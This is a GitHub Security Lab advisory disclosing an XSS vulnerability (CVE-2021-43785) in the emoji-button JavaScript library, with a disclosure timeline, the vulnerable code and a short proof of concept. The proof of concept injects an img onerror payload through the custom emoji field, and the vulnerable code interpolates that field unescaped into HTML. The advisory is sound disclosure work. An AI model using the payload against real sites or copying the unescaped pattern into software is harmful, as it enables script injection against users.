Coordinated Disclosure Timeline
- 2021-11-24: Maintainer contacted
- 2021-11-25: Maintainer acknowledged the issue
-
2021-11-25: Maintainer pushed a fix for the issue
- 2021-11-25: Maintainer published an advisory
Summary
emoji-button is prone to XSS when handling untrusted emojis.
Product
emoji-button
Tested Version
Details
Issue 1: XSS while handling emoji field (GHSL-2021-1043)
An attacker that is able to influence the field emoji when creating a rn instance is able to supply arbitrary html or javascript that will be rendered in the context of a user leading to XSS.
Proof of concept snippet:
const trigger = document.querySelector('#trigger');
const picker = new rn({
custom: [
{
name: 'XSS triggering emoji',
emoji: '"> <img src="foobar" onerror="alert(1);" /> <',
}
]
});
trigger.addEventListener('click', () => picker.togglePicker(trigger));
Vulnerable code: emoji.ts
if (this.emoji.custom) {
content = this.lazy
? smile
: `<img class="${CLASS_CUSTOM_EMOJI}" src="${this.emoji.emoji}">`;
Impact
This issue may lead to XSS
Resources
CVE
- CVE-2021-43785
Resources
Credit
This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1043 in any communication regarding this issue.